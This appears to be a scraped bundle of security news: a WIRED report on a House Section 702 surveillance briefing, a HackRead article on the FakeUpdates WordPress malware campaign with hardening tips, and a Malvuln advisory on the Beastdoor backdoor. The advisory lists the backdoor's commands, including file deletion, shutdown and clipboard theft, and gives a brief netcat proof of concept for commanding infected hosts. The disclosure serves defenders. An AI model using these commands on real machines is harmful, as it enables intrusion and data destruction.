EquiLend’s data breach should be a wakeup for organizations to prioritize data security investments and implement strong safeguards against cyberattacks.

1.  **FIN8 Resurfaces with New Sardonic Backdoor**
2.  **Hive Ransomware Resurfaces as Hunters International**
3.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
4.  **Mirai botnet resurfaces with MooBot variant to target D-Link devices**
5.  **Nasty Mamba ransomware that encrypts entire hard drive resurfaces**

EquiLend Employee Data Breached After January Ransomware Attack

A closed-door presentation for House lawmakers late last year portrayed American anti-war protesters as having possible ties to Hamas in an effort to kill privacy reforms to a major US spy program.

At a private meeting about the reauthorization of a major United States surveillance program late last year, the Republican chairman of the US House Permanent Select Committee on Intelligence (HPSCI) presented an image of Americans protesting the war in Gaza while implying possible ties between the protesters and Hamas, an allegation that was used to illustrate why surveillance reforms may prove detrimental to national security, WIRED has learned. Sources who attended the meeting say it alarmed Republicans who are pursuing new limits on the US government's power to warrantlessly access the communications of US citizens.

In December, as many as 200 Republican staffers gathered behind closed doors to hear a presentation by House Intelligence chair Mike Turner, one of several such meetings that day aimed at shoring up support for a US surveillance program known as Section 702.

House lawmakers were expected to cast votes the following day to determine which of two rival bills would become law. While both aimed to reauthorize the 702 program, they shared little else in common. The first bill was backed by Turner and Jim Himes—HPSCI's leading Democrat—and had the support of the US intelligence community. The second, a bill chock full of privacy reforms, had been introduced by the House Judiciary Committee and was opposed by the Biden White House.

While Turner addressed the Republican staffers, representatives from the intelligence community conducted their own briefing with Democrats on Capitol Hill. Both meetings were designed to dissuade House members from supporting the privacy reforms offered under the Judiciary bill—chiefly among them, an amendment that would force the FBI to obtain warrants before accessing the communications of Americans collected under the 702 program—phone calls, emails, and text messages intercepted by US spies in the process of eavesdropping on foreigners overseas.

The briefing conducted by Turner at roughly 2 pm EST on December 11 carried on for more than an hour. Roughly 15 minutes into the presentation, two slides were introduced referencing American protesters. The implication, sources present for the briefing tell WIRED, was that the demonstrators were suspected of having ties to Hamas, which the US government classifies as a terrorist organization.

A spokesperson for the House Intelligence Committee said in an email on Friday that the protesters depicted in the slide had “responded to what appears to be a Hamas solicitation.”

A WIRED review of the slides shown by Turner casts doubt on that claim. Notably, while the two slides were portrayed as being related to a single protest in November outside Senate majority leader Chuck Schumer's Brooklyn residence, WIRED has since learned that the slides reference two separate events that occurred nearly a month apart.

What’s more, the allegation that the protesters were following Hamas' lead is based on a post on X that contains false information about who organized one of these two events.

Three Republican staffers who attended Turner’s briefing that day tell WIRED the images immediately set off alarms. Section 702 authorizes the government to surveil foreigners located physically overseas, they said, but not Americans or individuals on US soil. Even while Turner spoke, a few staffers began privately debating whether what Turner described was a lawful use of the program.

While eavesdropping on foreigners is permitted, doing so for the explicit purpose of gaining access to an American’s communications—a practice commonly referred to as “reverse targeting”—is strictly forbidden.

"At the outset of the presentation, he's running through slides, making his case for why 702 reauthorization is needed,” a senior Republican aide tells WIRED. “Then he throws up that photo. The framing was: ‘Here are protesters outside of Chuck Schumer's house. We need to be able to use 702 to query these people.’”

Another aide in attendance said: "The sentiment was that \[Turner\] wanted to know if these people were talking to Hamas. That's how I interpreted why he brought up those slides."

Jeff Naft, the HPSCI spokesperson, says the purpose of the slides was to illustrate that, even if the protesters did have ties to Hamas, they would “not be subject to surveillance” under the 702 program. “702 is not used to target protesters," he says. “702 is used on foreign terrorist organizations, like Hamas. Chairman Turner’s presentation was a distinction exercise to explain the difference between a US person and Hamas.”

WIRED's sources, who are not authorized to discuss closed-door briefings and requested anonymity to do so, describe this as a conflation of two separate issues—a tactic, they say, that has become commonplace in the debate over the program’s future. “Yes, it’s true, you cannot ‘target’ protesters under 702,” one aide, a legislative director for a Republican lawmaker, says. “But that doesn’t mean the FBI doesn't still have the power to access those emails or listen to their calls if it wants.”

Under the 702 program—authorized under the Foreign Intelligence Surveillance Act (FISA)—the term “target” refers to foreign individuals whose communications are primarily sought after by US spies. But a person needn't be a “target” (or a foreigner, for that matter) for the US government to intercept their calls or emails. Nor does a person need to be a “target” for the FBI to access and review those conversations, a practice that privacy advocates have come to call a “backdoor search.”

The government’s claim that 702 is not used to _target_ protesters may be misleading to those not steeped in the program’s specifics. Between 2020 and early 2021, the FBI conducted “tens of thousands” of queries related to “civil unrest” in the United States. Even had those queries been lawful, the FBI would never have referred to those Americans as “targets.” For people whose communications are being accessed, it’s a distinction without much of a difference.

A Biden administration official tells WIRED that it was made clear at the briefing that individuals “can never be queried due to the fact that they participated in a protest.” Any suggestion to the contrary, they said, is inaccurate. “US person queries of lawfully collected 702 data are based on information such as contact with a foreign terrorist, since such queries must be reasonably likely to return foreign intelligence information,” the official says.

The bar for justifying a query, though, is far below “contact with a terrorist,” according to Elizabeth Goitein, a senior director at the Brennan Center for Justice at the NYU School of Law. “The law’s definition of ‘foreign intelligence’ is extremely broad and sweeps far beyond matters relating to terrorism or espionage,” she says.

A query for an American's communications may be allowed, for instance, if it's deemed necessary for “purposes of security," Goitein says, noting that the term “security” isn't defined. The information sought by the government can merely be necessary to understand the “conduct of foreign affairs,” something that the Center for Strategic & International Studies says may apply to “almost any activity.”

Last year, the FISA court approved three definitions of foreign intelligence information, adds Goitein. One of them is simply information related to “foreign governments and related entities.”

James Czerniawski, a senior policy analyst at Americans for Prosperity, a libertarian think tank, says the idea that US protesters could be queried under 702 without a warrant, simply based on accusations of harboring overseas ties, represents “an affront to Americans' privacy.”

"It manifests why trust has eroded in the very institutions meant to protect us, and it represents a material threat to the millions of Americans who will undoubtedly soon join protests,” Czerniawski says, “no matter what happens in November.”

Beyond what the slides represented to Turner’s audience at the time, they are more controversial now for reasons that weren't quite apparent during that December 11 briefing.

The first of Turner's slides includes a photograph of anti-war activists sitting cross-legged at an intersection in Brooklyn’s Park Slope neighborhood, arms interlocked. The second slide features a tweet by Matthew Foldi, a conservative staff writer at the Washington Free Beacon. It also relates to a protest outside of Schumer’s home. The implication of Foldi’s tweet, sources say, was that the protesters in both cases had gotten their marching orders overseas from an organization Foldi referred to as a “Hamas front group.”

Regardless of whether Turner and his staff bought into the claim, there are several issues with this portrayal, and HPSCI had no evidence on hand to support the allegation—not to staff members in December and not last week when questioned by WIRED about the veracity of the claim.

The first of the two slides, showing protesters sitting in the street, can be traced back to a demonstration on October 13, organized by the US nonprofit Jewish Voice for Peace. Thousands of Americans had attended protests across New York City that day.

According to a local news report, several rabbis as well as descendants of Holocaust survivors were among the 57 people arrested for blocking traffic near Schumer’s home. New York State Assembly members Zohran Mamdani and Marcela Mitaynes were also present and were issued citations for acts of civil disobedience. Statements gathered from journalists at the scene show the demonstration was being closely monitored by the FBI’s New York field office. But aside from a few “scuffles” with counter-protesters earlier in the day, there are no reports of the protests turning violent.

Sean Vitka, a policy director at the civil-liberties-focused nonprofit Demand Progress, says Congress enacted FISA specifically to stop the FBI from spying on protesters. "Spying on protesters is ice in the heart of democracy—and if someone trolling the ‘other side’s’ protest on Twitter is cause to spy on those protesters, we have an enormous problem,” he says.

The second slide in Turner’s presentation featured the tweet by Foldi, which likewise references a march on Schumer’s home. That protest, however, took place nearly a month after the first. HPSCI's claim that Hamas may have incited the demonstration appears solely based on this remark by Foldi, who claims the protesters were responding to a call issued by a pro-Palestinian group known as Samidoun.

However, that wasn't the case.

The only evidence of the Palestinian group’s involvement is that the protest was included on a calendar maintained by Samidoun on its website. The calendar currently lists more than 5,000 protests that have taken place around the world, from Australia and England to Finland, Nigeria, Iceland, and Japan. The same site bears a disclaimer that notes the list includes protests not organized by Samidoun, and visitors are encouraged to submit details about events being organized in their respective countries.

Foldi went on to portray Samidoun as having been “banned from Germany and booted from numerous payment processors over suspicions of acting as a Hamas front group.”

A German branch of Samidoun was dissolved in November, but not as a result of evidence it had ties to Hamas. Rather, the group, formed to protest the imprisonment of Palestinians, was accused of spreading “anti-Jewish conspiracy theories,” an allegation that the organizers vehemently deny, while noting their ranks boast many Jewish members.

For obvious reasons, Germany has some of the strictest antisemitism laws in the world, enabling Berlin to issue blanket bans against protests aimed at raising awareness of the humanitarian crisis in Gaza. Such bans would be unlawful in the United States under its constitution.

Branches of Samidoun have also faced bans by payment processors overseas. This also happens frequently in the United States. The bar for being banned by a payment processor is notably far below having terrorism ties.

Payment processors last year severed ties with a French branch of the group, known as Collectif Palestine Vaincra, a result of the French government attempting to dissolve the organization under allegations it was “anti-Jewish.” This attempt was blocked by a French court in May, however, after it rules the Macron government's allegations of “antisemitism” against the group were “unfounded.”

Neither Foldi nor Samidoun immediately responded to requests for comment.

That the chairman of a US intelligence committee chose such questionable examples during a presentation aimed at garnering support for a US surveillance authority gave many Republican staffers pause.

None of the House sources who spoke to WIRED work for lawmakers that could be credibly accused of showing anything but support for the Israeli government. Yet all agreed the issue of domestic surveillance transcends political ideology—one of the purest examples of the “pendulum politics” that define America’s two-party system.

“What we know for sure is this,” a Republican aide says, “However the government decides to treat left-wing protesters today, that’s how we should expect protesters in our party to be treated under future administrations.”

A House Democratic staffer—half-jokingly referencing the Cold War doctrine of “mutually assured annihilation”—says that they agreed “wholeheartedly” with the sentiment. “Our fates are aligned,” they say. “That's the best defense we have.”

“Political protest is literally how America was founded. It’s in our DNA,” says Jason Pye, senior policy analyst at the nonprofit FreedomWorks. “Whether you agree with these protesters or not is irrelevant.”

US Lawmaker Cited NYC Protests in a Defense of Warrantless Spying

By Waqas
The February 2024 Global Threat Index report released by Check Point Software Technologies Ltd. exposes the alarming vulnerability of cybersecurity worldwide.
This is a post from HackRead.com Read the original post: FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

WordPress websites are under attack! FakeUpdates malware exploits vulnerabilities and injects malicious code. LockBit3 dominates the world of ransomware. Web server flaws leave organizations exposed. Experts advocate strong security and zero tolerance for cyber threats.

As of March 2024, approximately 835 million websites are utilizing the WordPress Content Management System (CMS). This vast presence makes WordPress an extremely **lucrative target** for cybercriminals.

To highlight the ongoing threats to WordPress, according to the February 2024 Global Threat Index released by Check Point Software Technologies Ltd., this week, researchers have uncovered a fresh wave of cyber threats including malware attacks aimed at WordPress websites.

The campaign, identified as **FakeUpdates or SocGholish**, involved compromising WordPress sites through hacked admin accounts. The malware employed various tactics, including modified versions of legitimate WordPress plugins, to infiltrate websites and deceive users into downloading a Remote Access Trojan.

Despite efforts to combat it, FakeUpdates has persisted since at least 2017, posing a significant threat to website security. Some of the attack’s examples are previously identified incidents targeting products like **Windows** and **Chrome browsers**.

In the attack, the malware primarily targets websites with content management systems, aiming to trick users into downloading malicious software. Associated with the Russian cybercrime group **Evil Corp**, FakeUpdates is believed to generate revenue by selling access to infected systems.

As per the research shared with Hackread.com ahead of publication on Monday, Maya Horowitz, VP of Research at Check Point Software, emphasized the importance of protecting websites from cyber threats.

She highlighted the critical role websites play in modern society and the potential consequences of malware attacks on online presence and reputation. Horowitz stressed the need for proactive measures and a zero-tolerance approach to cybersecurity threats.

****LockBit and Ransomware****

Check Point’s Global Threat Index also **revealed** insights into ransomware activities, including data from approximately 200 ransomware “shame sites” operated by double-extortion ransomware groups.

Lockbit3, **despite its shutdown**, not only **returned** also but remained the most prevalent ransomware group in February, responsible for 20% of reported incidents. Play and 8base followed closely, with 8% and 7% of incidents, respectively. Play, which entered the top three for the first time, was responsible for a **recent cyberattack** on the city of Oakland.

Additionally, the report highlighted the most exploited vulnerabilities globally in February. The “Web Servers Malicious URL Directory Traversal” vulnerability affected 51% of organizations, followed by “Command Injection Over HTTP” and “Zyxel ZyWALL Command Injection,” each impacting 50% of organizations.

****Protect Your WordPress Website****

Here are 6 important tips to protect your WordPress website:

****Strong Login Credentials:****

*   Always use a strong and unique password for your WordPress admin account. Avoid using easily guessable information like your name, birthday, or pet’s name.
*   Consider using a password manager to generate and store strong passwords for all your online accounts.
*   Enable two-factor authentication (2FA) for an extra layer of security. This requires a second verification code, typically sent to your phone, in addition to your password when logging in.

**Regular Updates:**

*   Regularly update your WordPress core, themes, and plugins. Updates often contain security patches that address newly discovered vulnerabilities.
*   You can enable automatic updates in the WordPress dashboard to ensure your website stays up-to-date.

**Security Plugins:**

*   Consider installing a security plugin to add additional layers of protection to your website. These plugins can help monitor your website for malware, block suspicious activity, and protect against brute-force login attempts.

**Backups:**

*   Regularly back up your website files and database. This will allow you to restore your website to its previous state if it is compromised by a cyberattack.
*   There are several plugins available that can automate the backup process.

****Limit User Access:****

*   Only grant users the minimum level of access they need to perform their tasks. For example, if a user only needs to edit blog posts, there is no need to give them administrator privileges.

****Secure Hosting Provider**:**

Choose a reputable web hosting provider that prioritizes security measures. While choosing a hosting service, always look for features like the following:

*   Regular security audits and vulnerability assessments.
*   Automatic malware scanning and removal.
*   Firewalls and intrusion detection systems.
*   Secure data centres with physical and digital access control.

1.  Fake Lockdown Mode Exposes iOS Users to Malware Attacks
2.  Fake Skype, Zoom, Google Meet Sites Infect Devices with RATs
3.  The Fake Fix: New Chae$ 4.1 Malware Hides in Driver Downloads
4.  Hackers on WordPress Websites Hacking Spree with Balada Malware
5.  Fake Resumes, Real Malware: TA4557 Exploits Recruiters for Backdoor

FakeUpdates Malware Campaign Targets WordPress – Millions of Sites at Risk

Backdoor.Win32.Beastdoor.oq malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Beastdoor.oqVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.Family: BeastdoorType: PE32MD5: 6268df4c9c805c90725dde4fe5ef6feaVuln ID: MVID-2024-0674Dropped files: svchost.exeDisclosure: 03/09/2024Commands:27 return victims username and computer information5 or 19 will shutdown victims computer6 restart victims computer9 delete all files including program files16 victim computer screen goes black28 returns clipboard information30 terminates the backdoor and deletes it from the systemExploit/PoC:C:\sec>nc64.exe x.x.x.x 13322727VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe2828I dont like u30Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#backdoor